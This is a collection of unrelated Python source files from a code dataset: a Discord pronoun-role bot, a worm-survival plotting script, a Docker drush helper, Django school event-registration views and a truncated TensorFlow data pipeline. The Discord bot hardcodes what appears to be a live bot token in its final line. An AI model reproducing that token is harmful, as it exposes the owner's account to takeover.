+{"seq_id":"234457739","text":"\r\nimport discord\r\nfrom discord.ext.commands import Bot\r\nfrom discord.ext import commands\r\nimport asyncio\r\nimport time\r\n\r\npronouns = [\"they/them/theirs\", \"she/her/hers\", \"he/him/his\", \"by name\", \"other\"]\r\n\r\nClient = discord.Client()\r\nclient = commands.Bot(command_prefix = \".\")\r\n\r\n@client.event\r\nasync def on_ready():\r\n\tprint(\"Ready for action!\")\r\n\r\n@client.event\r\nasync def on_message(message):\r\n\tif message.content.startswith(\".list\"):\r\n\t\tawait client.send_message(message.channel, \"```%s```\" % \"\\n\".join(pronouns))\r\n\t\r\n\telif message.content.startswith(\".add\"):\r\n\t\tentered_pronoun = parse_pronoun(message.content[5:].lower())\r\n\t\tif entered_pronoun != \"null\":\r\n\t\t\trole = discord.utils.get(message.server.roles, name=entered_pronoun)\r\n\t\t\tawait client.add_roles(message.author, role)\r\n\t\t\tawait client.send_message(message.channel, \"I did it! I added %s\" % entered_pronoun)\r\n\t\telse:\r\n\t\t\tawait client.send_message(message.channel, \"I don't know that pronoun. Type '.list' to see a list of available roles.\")\r\n\t\r\n\telif message.content.startswith(\".remove\"):\r\n\t\tentered_pronoun = parse_pronoun(message.content[8:].lower())\r\n\t\tif entered_pronoun != \"null\":\r\n\t\t\trole = discord.utils.get(message.server.roles, name=entered_pronoun)\r\n\t\t\tawait client.remove_roles(message.author, role)\r\n\t\t\tawait client.send_message(message.channel, \"I did it! I removed %s\" % entered_pronoun)\r\n\t\telse:\r\n\t\t\tawait client.send_message(message.channel, \"I don't know that pronoun. Type '.list' to see a list of available roles.\")\r\n\r\n\telif message.content.startswith(\".help\"):\r\n\t\tawait client.send_message(message.channel, \"Type '.list' to see a list of pronouns.\\nType '.add [pronoun]' to add assign yourself a pronoun.\\nType '.remove [pronoun]' to remove a pronoun from yourself.\")\r\n\t\r\n\telif message.content.startswith(\".greet\"):\r\n \t\tawait client.send_message(message.channel, \"Welcome! Type '.help' to see how to set your pronouns.\")\r\n\r\n\telif message.content.startswith(\".\"):\r\n\t\tawait client.send_message(message.channel, \"Command not recognized. 
Type '.help' for a list of commands.\")\t\r\n\r\n\t#Assign: Mod add role to member\r\n\r\ndef parse_pronoun(content):\r\n\tif content.startswith(\"they\"):\r\n\t\tentered_pronoun = \"they/them/theirs\"\r\n\telif content.startswith(\"she\"):\r\n\t\tentered_pronoun = \"she/her/hers\"\r\n\telif content.startswith(\"he\"):\r\n\t\tentered_pronoun = \"he/him/his\"\r\n\telif content.startswith(\"by\"):\r\n\t\tentered_pronoun = \"by name\"\r\n\telif content.startswith(\"other\"):\r\n\t\tentered_pronoun = \"other\"\r\n\telse:\r\n\t\tentered_pronoun = \"null\"\r\n\treturn entered_pronoun\r\n\r\nclient.run(\"NDU4OTM5ODI2NzY3NTI3OTM3.Dgu9xA.KKP9xq2SETNjij4aWHBmrUJ3Mo0\")","sub_path":"pronoun_bot_code.py","file_name":"pronoun_bot_code.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"455996076","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 14 21:36:48 2020\n\n@author: Miyazaki\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os, sys\n\nfrom tkinter import filedialog\nimport tkinter \nfrom tkinter import messagebox\nfrom matplotlib.ticker import MaxNLocator\n\n\n####1, folder select####\nroot = tkinter.Tk()\nroot.withdraw()\n\nfld = filedialog.askdirectory()\nans = messagebox.askokcancel('Kaplan-Meier-single.py',\"start death analysis\")\nif not ans:\n messagebox.showinfo('cancel', 'stop before analysis')\n sys.exit()\nos.chdir(fld)\nos.makedirs('../Death_analysis/CDF',exist_ok = True)\nos.makedirs('../Death_analysis/Distribution',exist_ok = True)\n\nlifetable_list = list(os.listdir(fld))\nlifetable_filename = []\n\nfor i in range(len(lifetable_list)):\n lifetable_csv_filename = lifetable_list[i]\n # temp file name\n lifetable_filename_split = lifetable_list[i].split('.')\n lifetable_filename.append(\".\".join(lifetable_filename_split[0:-1]))\n\nfor j in lifetable_filename:\n tempsplit = j.split('_')\n strain_name_list = tempsplit[0: -1]\n strain_name = '_'.join(strain_name_list)\n data = pd.read_csv('../raw_datas/{}.csv'.format(strain_name))\n die_data = []\n for i in range(1,22):\n die_data.append(data[\"day{}_die\".format(i)].sum())\n fig1 = plt.figure(figsize=(8, 5), frameon=True, edgecolor=\"black\", linewidth=0)\n ax1 = fig1.add_subplot()\n plt.bar(range(1,22), die_data, color = 'gray')\n ax1.spines['top'].set_linewidth(0)\n ax1.spines['right'].set_linewidth(0)\n ax1.yaxis.set_major_locator(MaxNLocator(integer=True))\n plt.ylim(0,7)\n plt.ylabel('Number of Dead worms', fontsize = 20)\n plt.xlabel('Day', fontsize = 20)\n plt.savefig('../Death_analysis/Distribution/{}.png'.format(strain_name), bbox_inches=\"tight\")
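\n\n # Cumulative distribution of deaths: a running sum of each day's death\n # fraction (equivalent to np.cumsum(die_data) / die_data.sum()).\n die_data = np.array(die_data)\n cdf = []\n for i in range(len(die_data)):\n if i == 0:\n cdf.append(die_data[i]/die_data.sum())\n else:\n temp = cdf[i-1] + die_data[i]/die_data.sum()\n cdf.append(temp)\n fig2 = plt.figure(figsize=(8, 5), frameon=True, edgecolor=\"black\", linewidth=0)\n ax2 = fig2.add_subplot()\n plt.plot(range(1,22), cdf, color = 'gray')\n ax2.spines['top'].set_linewidth(0)\n ax2.spines['right'].set_linewidth(0)\n plt.ylabel('Cumulative freq. 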
dist.', fontsize = 20)\n plt.xlabel('Day', fontsize = 20)\n plt.ylim(0,1.1)\n plt.savefig('../Death_analysis/CDF/{}.png'.format(strain_name) , bbox_inches=\"tight\")","sub_path":"Data_analysis/Survival_analysis/Dead_worm_analysis/Deadworm_analysis.py","file_name":"Deadworm_analysis.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"95131760","text":"import os\nfrom docker_console import cmd_options\nfrom docker_console.web.engines.base.docker import BaseDocker\n\n\nclass Docker(BaseDocker):\n def __init__(self, config):\n super(Docker, self).__init__(config)\n\n def _get_volumes(self):\n volumes = []\n db_path = os.path.join(self.config.BUILD_PATH, self.config.DB[self.config.db_alias]['DUMP_IMPORT_FILE'])\n if db_path and os.path.islink(db_path):\n real_db_path = os.path.realpath(db_path)\n volumes.append('-v %s:%s' % (real_db_path, db_path.replace(self.config.BUILD_PATH, '/app/')))\n\n files_path = os.path.join(self.config.BUILD_PATH, self.config.DRUPAL[self.config.drupal_site]['FILES_ARCHIVE'])\n if files_path and os.path.islink(files_path):\n real_files_path = os.path.realpath(files_path)\n volumes.append('-v %s:%s' % (real_files_path, files_path.replace(self.config.BUILD_PATH, '/app/')))\n\n private_files_path = os.path.join(self.config.BUILD_PATH, self.config.DRUPAL[self.config.drupal_site]['PRIVATE_FILES_ARCHIVE'])\n if private_files_path and os.path.islink(private_files_path):\n real_private_files_path = os.path.realpath(private_files_path)\n volumes.append('-v %s:%s' % (real_private_files_path,\n private_files_path.replace(self.config.BUILD_PATH, '/app/')))\n\n # AWS mounts are required for example for cron run\n if cmd_options.with_aws_mounts:\n volumes.append('-v /opt/files:/opt/files')\n\n volumes.append('-v %s:%s' % (self.config.BUILD_PATH, '/app'))\n return ' '.join(volumes)\n\n def drush_run(self):\n if cmd_options.docker_drush_eval_run_code is None:\n # Use parameters starting only from 'drush' command position\n cmd = ' '.join(self.config.args[self.config.args.index('drush')+1:])\n else:\n cmd = \"ev '%s'\" % cmd_options.docker_drush_eval_run_code\n if cmd_options.docker_yes_all:\n cmd += ' -y'\n self.docker_drush(cmd)\n\n def docker_drush(self, cmd=''):\n uri = self.config.DRUPAL[self.config.drupal_site]['SITE_URI']\n self.docker_run('drush -r %s --uri=%s %s' % (os.path.join('/app', self.config.WEB['APP_LOCATION']), uri, cmd))\n","sub_path":"docker_console/web/engines/drupal7/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"470301039","text":"import csv\nfrom datetime import date, datetime\n\nfrom django.contrib import messages\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.core import serializers\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.serializers import json\nfrom django.forms import modelformset_factory, model_to_dict\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\n\n# Create your views here.\nfrom django.urls import reverse_lazy, reverse\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import DeleteView\nfrom profiles.models import Profile\nfrom 
.models import Event, default_event_date, Registration, Block\nfrom .forms import EventForm, AttendanceForm, AttendanceFormSetHelper, RegistrationForm, LocationForm\n\n#Hello it's Me (Nandini)\n@staff_member_required\ndef location_create(request):\n form = LocationForm(request.POST or None)\n\n if form.is_valid():\n loc = form.save()\n messages.success(request, \"New location added: %s (%s)\" % (loc, loc.name))\n return redirect('events:create')\n\n context = {\n \"title\": \"Add new location\",\n \"form\": form,\n \"btn_value\": \"Save\"\n }\n return render(request, \"events/location_form.html\", context)\n\n\n@staff_member_required\ndef event_create(request):\n form = EventForm(request.POST or None)\n\n if form.is_valid():\n event = form.save(commit=False)\n event.creator = request.user\n event.save()\n form.save_m2m()\n\n msg = \"New event created for %s: %s\" % (event.date, event.title)\n\n num_duplicates = form.cleaned_data['duplicate']\n if num_duplicates:\n dupe_dates = event.copy(num_duplicates, user=request.user)\n # http://stackoverflow.com/questions/9052433/overriding-default-format-when-printing-a-list-of-datetime-objects\n msg += \"; duplicates made for %s.\" % ', '.join(map(str, dupe_dates))\n\n messages.success(request, msg)\n\n if not event.cache_remote_image():\n messages.warning(request, \"Failed to properly cache your image. Don't worry about it for now... unless \"\n \"you didn't provide an image link, in which case please let Tylere know!\")\n\n block_id = event.blocks.all()[0].id\n date_query = event.date\n return redirect(\"%s?date=%s\" % (reverse('events:list_by_block', args=(block_id,)), date_query))\n\n context = {\n \"title\": \"Create Event\",\n \"form\": form,\n \"btn_value\": \"Save\"\n }\n return render(request, \"events/event_form.html\", context)\n\n\n@staff_member_required\ndef event_update(request, id=None):\n event = get_object_or_404(Event, id=id)\n has_registrants = event.registration_set.all().exists()\n\n if has_registrants:\n regs_dict_by_block = {} # empty dict\n for block in Block.objects.all():\n regs_dict_by_block[block.id] = block.registration_set.filter(event=event).count()\n\n form = EventForm(request.POST or None, instance=event)\n\n # not valid?\n if form.is_valid():\n new_max_capacity = form.cleaned_data['max_capacity']\n if has_registrants and new_max_capacity < max(regs_dict_by_block.values()):\n messages.warning(request,\n \" You can't reduce the max capacity (%d) below the current number of registered students \"\n \"in a block (%d). If this is a problem, you can delete the event to boot \"\n \" all students, then recreate it with the capacity you want.\"\n \"\" % (new_max_capacity, max(regs_dict_by_block.values())))\n\n else:\n event = form.save(commit=False)\n event.save()\n form.save_m2m()\n\n msg = \"Edits saved for %s: %s\" % (event.date, event.title)\n num_duplicates = form.cleaned_data['duplicate']\n if num_duplicates:\n dupe_dates = event.copy(num_duplicates, user=request.user)\n # http://stackoverflow.com/questions/9052433/overriding-default-format-when-printing-a-list-of-datetime-objects\n msg += \"; duplicates made for %s.\" % ', '.join(map(str, dupe_dates))\n\n messages.success(request, msg)\n\n if not event.cache_remote_image():\n messages.warning(request, \"Failed to properly cache your image. Don't worry about it for now... 
unless \"\n \"you didn't provide an image link, in which case please let Tylere know!\")\n\n block_id = event.blocks.all()[0].id\n date_query = event.date\n return redirect(\"%s?date=%s\" % (reverse('events:list_by_block', args=(block_id,)), date_query))\n\n context = {\n \"title\": event.title,\n \"delete_btn\": True,\n \"event\": event,\n \"form\": form,\n \"btn_value\": \"Save\",\n \"has_registrants\": has_registrants,\n # \"regs_dict_by_block\": regs_dict_by_block,\n }\n return render(request, \"events/event_form.html\", context)\n\n\n@staff_member_required\ndef event_copy(request, id):\n new_event = get_object_or_404(Event, id=id)\n\n blocks = new_event.blocks.all()\n facilitators = new_event.facilitators.all()\n\n new_event.pk = None # autogen a new primary key (quest_id by default)\n new_event.date = None\n\n d = {'blocks': blocks,\n 'facilitators': facilitators,\n }\n\n form = EventForm(request.POST or None, instance=new_event, initial=d)\n\n # not valid?\n if form.is_valid():\n event = form.save()\n\n messages.success(request, \"New event created for %s: %s\" % (event.date, event.title))\n\n block_id = event.blocks.all()[0].id\n date_query = event.date\n return redirect(\"%s?date=%s\" % (reverse('events:list_by_block', args=(block_id,)), date_query))\n\n context = {\n \"title\": new_event.title,\n \"event\": new_event,\n \"form\": form,\n \"btn_value\": \"Save\"\n }\n return render(request, \"events/event_form.html\", context)\n\n\ndef event_detail(request, id=None):\n instance = get_object_or_404(Event, id=id)\n context = {\n \"title\": instance.title,\n \"event\": instance,\n }\n return render(request, \"events/event_detail.html\", context)\n\n\n# @staff_member_required\n# def event_delete(request, id=None):\n# event = get_object_or_404(Event, id=id)\n# registrants = event.registration_set\n# event.delete()\n# if registrants is not None:\n# messages.warning(request, \"You deleted an event that already had students registered for it. 
\"\n# \"You may want to notify the students: \" + registrants)\n# else:\n# messages.success(request, \"Successfully deleted\")\n# return redirect(\"events/events:list\")\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass EventDelete(DeleteView):\n model = Event\n success_url = reverse_lazy('events:manage')\n\n\n@staff_member_required\ndef event_manage(request):\n # date_query = request.GET.get(\"date\", str(default_event_date()))\n # d = datetime.strptime(date_query, \"%Y-%m-%d\").date()\n\n queryset = Event.objects.filter(facilitators=request.user)\n\n # for event in queryset:\n # for block in event.blocks.all():\n # event.attendance = {}\n # event.attendance = event.registration_set.filter().count()\n\n context = {\n # \"date_filter\": date_query,\n # \"date_object\": d,\n \"title\": \"Your Events\",\n \"object_list\": queryset,\n # \"date_filter\": d,\n }\n return render(request, \"events/event_management.html\", context)\n\n\n###############################################\n#\n# ATTENDANCE VIEWS\n#\n################################################\n\n@staff_member_required\ndef event_attendance_keypad(request, id, block_id=None, absent_value=True):\n event = get_object_or_404(Event, id=id)\n\n registrations = event.registration_set.all()\n registrations.update(absent=absent_value)\n event.is_keypad_initialized = absent_value\n event.save()\n return event_attendance(request, id, block_id)\n\n\n@staff_member_required\ndef event_attendance_keypad_disable(request, id, block_id=None):\n return event_attendance_keypad(request, id, block_id, absent_value=False)\n\n\n@staff_member_required\ndef event_attendance(request, id=None, block_id=None):\n event = get_object_or_404(Event, id=id)\n blocks = event.blocks.all()\n\n multi_block_save_option = blocks.count() > 1 and \\\n (event.multi_block_event == Event.F1_AND_F2 or event.multi_block_event == Event.F1_OR_F2)\n\n if block_id:\n active_block = get_object_or_404(Block, id=block_id)\n else:\n active_block = blocks[0]\n\n queryset1 = Registration.objects.filter(event=event, block=active_block).order_by('student__last_name')\n\n # https://docs.djangoproject.com/en/1.9/topics/forms/modelforms/#model-formsets\n AttendanceFormSet1 = modelformset_factory(Registration,\n form=AttendanceForm,\n extra=0)\n helper = AttendanceFormSetHelper()\n\n if request.method ==\"POST\":\n formset1 = AttendanceFormSet1(\n request.POST, request.FILES,\n queryset=queryset1,\n prefix='flex1'\n )\n if formset1.is_valid():\n formset1.save()\n messages.success(request, \"Attendance saved for %s during %s\" % (event, active_block))\n\n else:\n formset1 = AttendanceFormSet1(queryset=queryset1, prefix='flex1')\n\n context = {\n \"object_list_1\": queryset1,\n \"event\": event,\n \"formset1\": formset1,\n \"helper\": helper,\n \"active_block\": active_block,\n \"multi_block_save_option\": multi_block_save_option,\n }\n return render(request, \"events/attendance.html\", context)\n\n\ndef event_list(request, block_id=None):\n date_query = request.GET.get(\"date\", str(default_event_date()))\n d = datetime.strptime(date_query, \"%Y-%m-%d\").date()\n\n if block_id:\n active_block = get_object_or_404(Block, id=block_id)\n else:\n active_block = Block.objects.all()[0]\n\n blocks = Block.objects.all()\n blocks_json = serializers.serialize('json', blocks, fields=('id', 'name', ))\n\n queryset = active_block.event_set.filter(date=d, category__visible_in_event_list=True).select_related('location')\n\n registrations = {}\n excuses_dict = {}\n if 
request.user.is_authenticated() and not request.user.is_staff:\n # Build a dictionary of user's registrations for this day:\n # {block_name: event,}\n for block in blocks:\n registrations[block] = {}\n try:\n reg = Registration.objects.get(student=request.user, block=block, event__date=d)\n except Registration.DoesNotExist:\n reg = None\n\n # Are they excused?\n excuses = request.user.excuse_set.all().date(d).in_block(block)\n if excuses:\n registrations[block][\"excuse\"] = excuses[0]\n\n registrations[block][\"reg\"] = reg\n\n for event in queryset:\n event.attendance = event.registration_set.filter(block=active_block).count()\n if request.user.is_authenticated():\n event.available, event.already, event.explanation = event.is_available(request.user, active_block)\n else:\n event.available = True\n\n context = {\n \"date_filter\": date_query,\n \"date_object\": d,\n \"title\": \"List\",\n \"object_list\": queryset,\n \"registrations\": registrations,\n \"excuses\": excuses_dict,\n \"blocks_json\": blocks_json,\n \"blocks\": blocks,\n \"active_block\": active_block,\n }\n return render(request, \"events/event_list.html\", context)\n\n###############################################\n#\n# STAFF LOCATIONS\n#\n################################################\n\n@login_required\ndef staff_locations(request):\n date_query = request.GET.get(\"date\", str(default_event_date()))\n d = datetime.strptime(date_query, \"%Y-%m-%d\").date()\n\n users = User.objects.filter(is_staff=True, is_active=True).values('id', 'first_name', 'last_name')\n users = list(users)\n\n events = Event.objects.filter(date=d)\n\n for user in users:\n user_events = events.filter(facilitators__id=user['id'])\n\n for block in Block.objects.all():\n try:\n block_events = user_events.filter(blocks=block)\n user[block.constant_string()] = block_events\n except ObjectDoesNotExist:\n user[block.constant_string()] = None\n\n context = {\n \"date_filter\": date_query,\n \"date_object\": d,\n \"users\": users,\n }\n return render(request, \"events/staff.html\", context)\n\n###############################################\n#\n# SYNERVOICE VIEWS\n#\n################################################\n\n@staff_member_required\ndef generate_synervoice_csv(request, d, no_reg_only=False):\n def blocks_absent(s):\n str = \"\"\n sep = \"\"\n if 'FLEX1' in s:\n str += s['FLEX1']\n sep = \" \"\n if 'FLEX2' in s:\n str += sep + s['FLEX2']\n return str\n\n d_str = d.strftime(\"%y%m%d\")\n attendance_data = Registration.objects.all_attendance(d, no_reg_only)\n # A 9h column exists if the student was absent or didn't register\n # maybe check for key instead?\n absent_data = [s for s in attendance_data if len(s) > 8]\n\n filename = \"synervoice\"\n if no_reg_only:\n filename += \"-not-registered\"\n else:\n filename += \"-attendance\"\n filename += \"-%s.csv\" % d_str\n\n # https://docs.djangoproject.com/en/1.10/howto/outputting-csv/\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=' + filename\n\n writer = csv.writer(response)\n\n writer.writerow([\"Student Name\",\n \"Student Number\",\n \"Homeroom Teacher\",\n \"Grade\",\n \"Home Phone\",\n \"Home Email\",\n \"Date\",\n \"Flex-1 Status\",\n \"Flex-1 Event\",\n \"Flex-2 Status\",\n \"Flex-2 Event\",\n ])\n\n for s in absent_data:\n # hack to remove excused students\n if \"EX\" in s['FLEX1'] and \"EX\" in s['FLEX2']:\n # if present: \"PRESENT OR EXCUSED\" so also caught\n pass\n else:\n writer.writerow([s['last_name'] + \", \" + 
s['first_name'],\n                             s['username'],\n                             s['profile__homeroom_teacher'],\n                             s['profile__grade'],\n                             s['profile__phone'],\n                             s['profile__email'],\n                             d_str,\n                             s['FLEX1'],\n                             s['FLEX1_EVENT'],\n                             s['FLEX2'],\n                             s['FLEX2_EVENT'],\n                             # blocks_absent(s), # Add F regardless of whether absent or didn't register, one or both\n                             ])\n\n    return response\n\n\n@staff_member_required\ndef synervoice(request):\n    date_query = request.GET.get(\"date\", str(default_event_date()))\n    d = datetime.strptime(date_query, \"%Y-%m-%d\").date()\n\n    if request.method == \"POST\":\n        event_date = request.POST.get(\"date\")\n        d = datetime.strptime(event_date, \"%Y-%m-%d\").date()\n        no_reg_only = False\n        if request.POST.get('registration'):\n            no_reg_only = True\n\n        return generate_synervoice_csv(request, d, no_reg_only)\n\n    context = {\n        \"date_filter\": date_query,\n        \"d\": d,\n    }\n\n    return render(request, \"events/synervoice.html\", context)\n\n\n###############################################\n#\n# REGISTRATION VIEWS\n#\n################################################\n@login_required\ndef registrations_list(request):\n    queryset = Registration.objects.filter(student=request.user)\n    context = {\n        \"object_list\": queryset\n    }\n    return render(request, \"events/registration_list.html\", context)\n\n\n@login_required\ndef register(request, id, block_id):\n    date_query = request.GET.get(\"date\", str(default_event_date()))\n    event = get_object_or_404(Event, id=id)\n\n    available = True # preset to True, then check both blocks, a conflict will switch this to False\n\n    # block_id = 0 indicates register for all block in an optional OR event.\n    both_on_or = False\n    if block_id == '0':\n        both_on_or = True\n        for block in event.blocks.all():\n            if available:\n                available, already, reason = event.is_available(request.user, block)\n                block_id = block.id # need to give it a valid id for page redirection. 0 not valid!\n    else:\n        block = get_object_or_404(Block, id=block_id)\n        available, already, reason = event.is_available(request.user, block)\n\n    block_text = \"\"\n    if available:\n        if event.both_required() or both_on_or:\n            for block in event.blocks.all():\n                Registration.objects.create_registration(event=event, student=request.user, block=block)\n                block_text += str(block) + \" \"\n\n        else:\n            Registration.objects.create_registration(event=event, student=request.user, block=block)\n            block_text = str(block)\n\n        messages.success(request, \"Successfully registered for %s during %s \" % (event, block_text))\n    else:\n        messages.warning(request, \" %s\" % reason)\n    return redirect(\"%s?date=%s\" % (reverse('events:list_by_block', args=(block_id,)), date_query))\n\n\n@login_required\ndef registrations_delete(request, id=None):\n    reg = get_object_or_404(Registration, id=id)\n    if reg.event.both_required():\n        # maybe try/except instead?\n        # Delete all records of this event (i.e. 
for all blocks)\n regs = Registration.objects.filter(event=reg.event, student=reg.student)\n regs.delete()\n else:\n reg.delete()\n messages.success(request, \"You've been removed from %s\" % reg.event)\n\n # Return to page that got us here.\n # http://stackoverflow.com/questions/12758786/redirect-return-to-same-previous-page-in-django\n # Don't do this with forms/POST\n if request.META: # this can be turned off, so need to check\n return redirect(request.META.get('HTTP_REFERER'))\n else:\n return redirect('events:registrations_list')\n\n\n@login_required\ndef registrations_manage(request):\n queryset = Registration.objects.filter(student=request.user)\n context = {\n \"object_list\": queryset\n }\n return render(request, \"events/registration_list.html\", context)\n\n\n@staff_member_required\ndef registrations_homeroom(request, user_id=None):\n date_query = request.GET.get(\"date\", str(default_event_date()))\n d = datetime.strptime(date_query, \"%Y-%m-%d\").date()\n\n if user_id:\n homeroom_teacher = get_object_or_404(User, id=user_id)\n else:\n homeroom_teacher = request.user\n\n students = Registration.objects.registration_check(d, homeroom_teacher)\n\n context = {\n \"heading\": \"Homeroom Students for \" + homeroom_teacher.get_full_name(),\n \"students\": students,\n \"date_filter\": date_query,\n \"date_object\": d,\n }\n return render(request, \"events/homeroom_list.html\", context)\n\n\n@staff_member_required\ndef registrations_all(request):\n date_query = request.GET.get(\"date\", str(default_event_date()))\n d = datetime.strptime(date_query, \"%Y-%m-%d\").date()\n\n students = Registration.objects.registration_check(d)\n\n context = {\n \"heading\": \"All Student Registrations\",\n \"students\": students,\n \"date_filter\": date_query,\n \"date_object\": d,\n \"include_homeroom_teacher\": 'true',\n }\n return render(request, \"events/homeroom_list.html\", context)\n","sub_path":"src/events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"334070678","text":"import tensorflow as tf\nimport string as sn\n\n\n# The location on the disk of project\nPROJECT_BASEDIR = './'\n\n\n# The location on the disk of checkpoints\nCHECKPOINT_BASEDIR = (PROJECT_BASEDIR + \"Checkpoints/\")\n\n\n# The location on the disk of project\nDATASET_BASEDIR = PROJECT_BASEDIR\n\n\n# Filenames associated with program dataset\nDATASET_FILENAMES_PYTHON = [\n (DATASET_BASEDIR + \"epf_8_dataset.csv\")\n]\n\n\n# Locate dataset files on hard disk\nfor FILE_PYTHON in DATASET_FILENAMES_PYTHON:\n if not tf.gfile.Exists(FILE_PYTHON):\n raise ValueError('Failed to find file: ' + FILE_PYTHON)\n\n\n# Dataset configuration constants\nDATASET_IO_EXAMPLES = 10\nDATASET_COLUMNS = (DATASET_IO_EXAMPLES * 2) + 2\nDATASET_DEFAULT = \"0\"\n\n\n# Tokenization parameters for python\nDATASET_VOCABULARY = sn.printable\nDATASET_MAXIMUM = 64\n\n\n# Convert elements of python source code to one-hot token vectors\ndef tokenize_source_code_python(source_code_python, vocabulary=DATASET_VOCABULARY):\n\n # List allowed characters\n mapping_characters = tf.string_split([vocabulary], delimiter=\"\")\n\n\n # List characters in each word\n input_characters = tf.string_split([source_code_python], delimiter=\"\")\n\n\n # Convert integer lookup table\n lookup_table = tf.contrib.lookup.index_table_from_tensor(mapping=mapping_characters.values, default_value=0)\n\n\n # Query lookup table\n one_hot_tensor = 
tf.one_hot(lookup_table.lookup(input_characters.values), len(vocabulary), dtype=tf.float32)\n\n\n # Calculate actual sequence length\n actual_length = tf.size(one_hot_tensor) // len(vocabulary)\n\n\n # Pad input to match DATASET_MAXIMUM\n expanded_tensor = tf.pad(one_hot_tensor, [[0, (DATASET_MAXIMUM - actual_length)], [0, 0]])\n\n return tf.reshape(expanded_tensor, [DATASET_MAXIMUM, len(vocabulary)]), actual_length\n\n\n# Read single row words\ndef decode_record_python(filename_queue, num_columns=DATASET_COLUMNS, default_value=DATASET_DEFAULT):\n\n # Attach text file reader\n DATASET_READER = tf.TextLineReader(skip_header_lines=1)\n\n\n # Read single line from dataset\n key, value_text = DATASET_READER.read(filename_queue)\n\n\n # Decode line to columns of strings\n name_column, *example_columns, function_column = tf.decode_csv(value_text, [[default_value] for i in range(num_columns)])\n\n\n # Convert IO examples from string to float32\n example_columns = tf.string_to_number(tf.stack(example_columns), out_type=tf.float32)\n\n\n # Convert python code to tokenized one-hot vectors\n program_tensor, actual_length = tokenize_source_code_python(function_column)\n\n return name_column, example_columns, program_tensor, actual_length\n\n\n# Batch configuration constants\nBATCH_SIZE = 32\nNUM_THREADS = 4\nTOTAL_EXAMPLES = 2015538\nEPOCH_SIZE = TOTAL_EXAMPLES // BATCH_SIZE\n\n\n# Generate batch from rows\ndef generate_batch(name, examples, program, length, batch_size=BATCH_SIZE, num_threads=NUM_THREADS, shuffle_batch=True):\n\n # Shuffle batch randomly\n if shuffle_batch:\n\n # Construct batch from queue of records\n name_batch, examples_batch, program_batch, length_batch = tf.train.shuffle_batch(\n [name, examples, program, length],\n batch_size=batch_size,\n num_threads=num_threads,\n capacity=TOTAL_EXAMPLES,\n min_after_dequeue=(TOTAL_EXAMPLES // 1000))\n\n\n # Preserve order of batch\n else:\n\n # Construct batch from queue of records\n name_batch, examples_batch, program_batch, length_batch = tf.train.batch(\n [name, examples, program, length],\n batch_size=batch_size,\n num_threads=num_threads,\n capacity=TOTAL_EXAMPLES)\n\n return name_batch, examples_batch, program_batch, length_batch\n\n\n\n# Generate single training batch of python programs\ndef training_batch_python():\n\n # A queue to generate batches\n filename_queue = tf.train.string_input_producer(DATASET_FILENAMES_PYTHON)\n\n\n # Decode from string to floating point\n name, examples, program, length = decode_record_python(filename_queue)\n\n\n # Combine example queue into batch\n name_batch, examples_batch, program_batch, length_batch = generate_batch(name, examples, program, length)\n\n return name_batch, examples_batch, program_batch, length_batch\n\n\n# Prefix model nomenclature\nPREFIX_RNN = \"rnn\"\nPREFIX_DENSE = \"dense\"\nPREFIX_SOFTMAX = \"softmax\"\nPREFIX_TOTAL = \"total\"\nPREFIX_GENERATOR = \"generator\"\nPREFIX_SYNTAX = \"syntax\"\nPREFIX_BEHAVIOR = \"behavior\"\n\n\n# Extension model nomenclature\nEXTENSION_NUMBER = (lambda number: \"_\" + str(number))\nEXTENSION_LOSS = \"_loss\"\nEXTENSION_WEIGHTS = \"_weights\"\nEXTENSION_BIASES = \"_biases\"\nEXTENSION_OFFSET = \"_offset\"\nEXTENSION_SCALE = \"_scale\"\nEXTENSION_ACTIVATION = \"_activation\"\nEXTENSION_COLUMN = \"_column\"\n\n\n# Collection model nomenclature\nCOLLECTION_LOSSES = \"losses\"\nCOLLECTION_PARAMETERS = \"parameters\"\nCOLLECTION_ACTIVATIONS = \"activations\"\n\n\n# Initialize trainable parameters\ndef initialize_weights_cpu(name, shape, 
standard_deviation=0.01, decay_factor=None):\n\n # Force usage of cpu\n with tf.device(\"/cpu:0\"):\n\n # Sample weights from normal distribution\n weights = tf.get_variable(\n name,\n shape,\n initializer=tf.truncated_normal_initializer(\n stddev=standard_deviation,\n dtype=tf.float32),\n dtype=tf.float32)\n\n # Add weight decay to loss function\n if decay_factor is not None:\n\n # Calculate decay with l2 loss\n weight_decay = tf.multiply(\n tf.nn.l2_loss(weights),\n decay_factor,\n name=(name + EXTENSION_LOSS))\n tf.add_to_collection(COLLECTION_LOSSES, weight_decay)\n\n return weights\n\n\n# Initialize trainable parameters\ndef initialize_biases_cpu(name, shape):\n\n # Force usage of cpu\n with tf.device(\"/cpu:0\"):\n\n # Sample weights from normal distribution\n biases = tf.get_variable(\n name,\n shape,\n initializer=tf.constant_initializer(1.0),\n dtype=tf.float32)\n\n return biases\n\n\n# Compute corrected tokenized code with rnn\ndef inference_generator_python(program_batch):\n\n # Placeholder weights for computation check\n generator_weights = initialize_weights_cpu((PREFIX_GENERATOR + EXTENSION_WEIGHTS), program_batch.shape)\n\n return program_batch * generator_weights\n\n\n# Compute behavior function with rnn\ndef inference_behavior_python(program_batch):\n\n # Placeholder weights for computation check\n behavior_weights = initialize_weights_cpu((PREFIX_BEHAVIOR + EXTENSION_WEIGHTS), [BATCH_SIZE])\n\n\n # Compute expected output given input example\n def behavior_function(input_example):\n\n return input_example * 